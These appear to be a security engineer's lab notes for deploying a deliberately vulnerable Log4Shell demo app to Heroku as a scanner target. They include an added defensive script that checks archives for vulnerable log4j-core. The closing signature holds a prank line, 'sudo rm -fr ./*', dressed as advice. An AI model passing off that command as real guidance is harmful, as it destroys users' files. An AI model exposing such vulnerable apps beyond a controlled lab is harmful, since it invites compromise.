Deploying a sample vulnerable Log4j application in Heroku

Installation - nuke this maybe?

brew install java
brew tap AdoptOpenJDK/openjdk
brew install adoptopenjdk8
brew install adoptopenjdk11
brew install adoptopenjdk13

Put this at the end of your ~/.zshrc or ~/.bashrc, so you can easily switch between different versions of Java:

# https://devqa.io/brew-install-java/
export JAVA_8_HOME=$(/usr/libexec/java_home -v1.8)
export JAVA_11_HOME=$(/usr/libexec/java_home -v11)

alias java8='export JAVA_HOME=$JAVA_8_HOME'
alias java11='export JAVA_HOME=$JAVA_11_HOME'

# default to Java 11
java11

Heroku setup

  • Create an application in Heroku

https://dashboard.heroku.com/apps

  • Build a WAR
git clone https://github.com/christophetd/log4shell-vulnerable-app.git
cd log4shell-vulnerable-app
./gradlew war

# Other option: https://github.com/kozmer/log4j-shell-poc.git
  • Try extracting the JAR file from the docker image
# From Christophe's repo: build the image locally
docker build . -t vulnerable-app

# Or pull the prebuilt image
docker pull ghcr.io/christophetd/log4shell-vulnerable-app

# Create a stopped container ("dummy" is just the container name, no need to replace it)
# and copy the application JAR out of it
docker create -ti --name dummy ghcr.io/christophetd/log4shell-vulnerable-app bash
docker cp dummy:/app/spring-boot-application.jar ./
docker rm dummy

# To run the app locally instead (the app is assumed to listen on 8080)
docker run --rm --name vulnerable-app -p 8080:8080 ghcr.io/christophetd/log4shell-vulnerable-app
  • Deploy with Heroku
heroku login
heroku plugins:install java
# heroku war:deploy ./target/log4shell-1.0-SNAPSHOT.war --app log4shell-example

The log4j-scanner doesn't enumerate request parameters on its own, so use a target app that doesn't require a parameter to be found:

git clone https://github.com/christophetd/log4shell-vulnerable-app.git
cd log4shell-vulnerable-app
jar -cvf log4shell-vulnerable-app.war *
heroku war:deploy ./log4shell-vulnerable-app.war --app log4shell-example

To troubleshoot, look at the logs: https://dashboard.heroku.com/apps/log4shell-example/logs
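Before pushing an artifact (the JAR copied out of the container above, or the WAR built here), it is worth confirming what log4j-core it actually bundles, so that a scanner result can be interpreted against a known baseline. The script below is an added example, not part of these notes or of christophetd's project: it lists nested log4j-core jars inside a JAR/WAR, reads the version from the Maven pom.properties (falling back to the filename), and reports whether JndiLookup.class is still present. The "looks vulnerable" rule (2.x below 2.15.0 with JndiLookup present) is the Log4Shell baseline and is an assumption of this example; the build_sample_war helper constructs a fake archive purely so the script can be exercised offline.

```python
"""Inspect a Spring Boot JAR or a WAR for bundled log4j-core (added example)."""
from __future__ import annotations

import io
import re
import sys
import zipfile
from dataclasses import dataclass

JNDI_LOOKUP_CLASS = "org/apache/logging/log4j/core/lookup/JndiLookup.class"
POM_PROPERTIES = "META-INF/maven/org.apache.logging.log4j/log4j-core/pom.properties"
# Matches e.g. WEB-INF/lib/log4j-core-2.14.1.jar or BOOT-INF/lib/log4j-core-2.0-beta9.jar
LOG4J_CORE_RE = re.compile(r"(?:^|/)log4j-core-([0-9][^/]*?)\.jar$")
FIXED_VERSION = (2, 15, 0)  # assumption: first log4j 2.x release with the Log4Shell fix


def _version_tuple(version: str) -> tuple[int, int, int]:
    """'2.14.1' -> (2, 14, 1); '2.0-beta9' -> (2, 0, 9); missing parts padded with 0."""
    nums = [int(p) for p in re.findall(r"\d+", version)[:3]]
    return tuple(nums + [0] * (3 - len(nums)))  # type: ignore[return-value]


@dataclass
class Finding:
    path: str                 # where the log4j-core jar sits inside the archive
    version: str              # version as declared by pom.properties or filename
    jndi_lookup_present: bool # True if JndiLookup.class still ships in the jar

    @property
    def looks_vulnerable(self) -> bool:
        v = _version_tuple(self.version)
        return self.jndi_lookup_present and v[0] == 2 and v < FIXED_VERSION


def _inspect_log4j_jar(jar_bytes: bytes, fallback_version: str) -> tuple[str, bool]:
    """Return (version, jndi_lookup_present) for one nested log4j-core jar."""
    with zipfile.ZipFile(io.BytesIO(jar_bytes)) as jar:
        names = set(jar.namelist())
        version = fallback_version
        if POM_PROPERTIES in names:
            for line in jar.read(POM_PROPERTIES).decode("utf-8", "replace").splitlines():
                if line.startswith("version="):
                    version = line.split("=", 1)[1].strip()
        return version, JNDI_LOOKUP_CLASS in names


def scan_archive(data: bytes) -> list[Finding]:
    """Find every log4j-core jar nested directly inside a JAR/WAR and inspect it."""
    findings: list[Finding] = []
    with zipfile.ZipFile(io.BytesIO(data)) as outer:
        for name in outer.namelist():
            m = LOG4J_CORE_RE.search(name)
            if m:
                version, has_jndi = _inspect_log4j_jar(outer.read(name), m.group(1))
                findings.append(Finding(name, version, has_jndi))
    return findings


def build_sample_war(log4j_version: str = "2.14.1", include_jndi: bool = True) -> bytes:
    """Constructed sample WAR with a fake nested log4j-core jar (not a real artifact)."""
    inner = io.BytesIO()
    with zipfile.ZipFile(inner, "w") as jar:
        jar.writestr(POM_PROPERTIES,
                     f"groupId=org.apache.logging.log4j\nartifactId=log4j-core\n"
                     f"version={log4j_version}\n")
        if include_jndi:
            jar.writestr(JNDI_LOOKUP_CLASS, b"\xca\xfe\xba\xbe")  # fake class file header
    outer = io.BytesIO()
    with zipfile.ZipFile(outer, "w") as war:
        war.writestr("WEB-INF/web.xml", "<web-app/>")
        war.writestr(f"WEB-INF/lib/log4j-core-{log4j_version}.jar", inner.getvalue())
    return outer.getvalue()


if __name__ == "__main__":
    # Usage: python inspect_log4j.py spring-boot-application.jar
    with open(sys.argv[1], "rb") as fh:
        for f in scan_archive(fh.read()):
            state = "LOOKS VULNERABLE" if f.looks_vulnerable else "ok"
            print(f"{f.path}: version={f.version} JndiLookup={f.jndi_lookup_present} -> {state}")
```

Only jars nested one level deep are inspected (WEB-INF/lib or BOOT-INF/lib), which covers both artifact shapes used on this page; a shaded or relocated log4j would need a broader class-name search.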

Helpful links:

https://dashboard.heroku.com/apps/log4shell-vulnerable/deploy/heroku-git

Kinnaird McQuade
Staff Security Engineer

Always remove the french language pack: sudo rm -fr ./*